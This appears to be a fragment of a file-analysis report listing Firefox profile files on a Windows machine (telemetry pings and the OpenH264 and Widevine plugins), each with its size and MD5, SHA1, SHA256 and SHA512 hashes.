C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\datareporting\glean\db\data.safe.tmp
Filesize15KB
MD514ef3a4bcfa096be35e4cf1ff348dc36
SHA19526a5aa1f57a7f4cccffd797c940e08564d7566
SHA256cab883feb77b15622aa5138e94254a53ff2f21ec9ac3fd4d5289881667e43b71
SHA512c653568b7c1a751a8b1a709112629043561b5ca701f960aef4236fab5695ffad828b447267a729060b8d36e76ed739bcec51cff3abd2a0af6b006fd163374dd7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\datareporting\glean\pending_pings\3bbde4f5-e57b-41ac-9507-c3d4549c333a
Filesize28KB
MD5eb13d76060050e8f81cffcfbabd7b222
SHA1448a0d1ef118fcb723cde00a651063cc10521923
SHA2560761e23fbba23f75e2271957ad2dae02ec6596c7ca1b132676a08e2be854a238
SHA512b40659f6e8d83e758c3a86505a24a94cfcfe95fcdb23dad63fc9cd928fb5c3a979dbcd0458875d866f48732a0aff2ef933f9601ef8e3fe2000aa28a56908420f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\datareporting\glean\pending_pings\e15ec9ba-7fcb-44f4-9c3a-eb2336aaea88
Filesize671B
MD568eec46d8d1acb2c1724610f64f17304
SHA1903e7b8b205b2f208f7d7b16460c28fef2203f8a
SHA256ea83963e924278d7f973a3e97ec7771790b414491baf7e300d58bcf142bc2a6a
SHA512f13be0af78c0ec5c773e54794e92e31bd95ac046e789d4efd00f0aa6078b23ea6cdb7245105589377c233dd1f5f10d245fd3cc78989a025c750adc7fb68ac34b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\datareporting\glean\pending_pings\ebb4ae57-3c23-4eba-a30e-ba034fc2dc4d
Filesize982B
MD519a0adebf3c9980837930907ed3b3fc5
SHA1df4c469575a22889a04d9b7aa7e375d9ebe19025
SHA25669d77415229ecb396d326d354574b2d8a691fefb9a72698be91deee471ce13c5
SHA512d84cea704094addfa765c1f8fb7ae83a39164f92eb749481542566413ee4f923a116e4bf4d7f49860093b2406f7649e0622a790de40662b6efdde19532ce746e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
15KB
MD521a980ed97e6ec8e657c03f0f066666e
SHA17b89aadb4c36af32a7aa958da0bc0b0b4288bc5b
SHA256302f3b736f19fadba7aca9a7a9c110140c294d049aa07d310752749c42312b5d
SHA512b718b538cb70971a715917af260cbaf4348a603197e78576921cb33d95dbbb927c9477c8bbe4a36163a0b482f43c04a03ba578aa352dc6afbf547ae2b33d754b
-
Filesize
10KB
MD53457813c324558643605d204e0d0af5f
SHA1347d0d7b9cee96724dce4f334e8c50aaad484400
SHA25654d288f8827949baab7915a8c2c3e8aad56efbfd40a08d9c9ea04892dd2a63e1
SHA5125e30383aa28df5a37331beda193d5cbc9622c41909a1de7f865f0a9e18df9c91bd05be67e9c050321815471806095138917251de8aacba300ba239ef296fb2f8
-
Filesize
12KB
MD5aea1c4a3d3ff6d9189ef1bfb102fbbe6
SHA172fbac307a074f5f1c79b23bd11c64ab0c042cfa
SHA2562cc89f9fb9193f90ff425a085a735ee99ed8b6cfd1e730fb035677d5d2ebecc5
SHA512a074ce21381d327fec3c52601395cfeacb0cea27740b00e21eff0842bb38cc5c03789c7a50e03fec22e09ef379f3bda397f7fe774745965d6d92b427c0736907
-
Filesize
10KB
MD558380fa911c01f0eccb0d5eda7684e72
SHA1e61819e251a62fd6a05599d9588433eb5895f3a0
SHA2562cc0b8c4103354a8ff080b767d0921bec53046f77af9c01d9897d31ebf7c51d2
SHA512746828eaf4cb30c038d29d061731388355135231995a4d09487785661bd4b0a4589426535b31b849f05630abdd346a143583b98cf9a124dad8488f24cdc3c378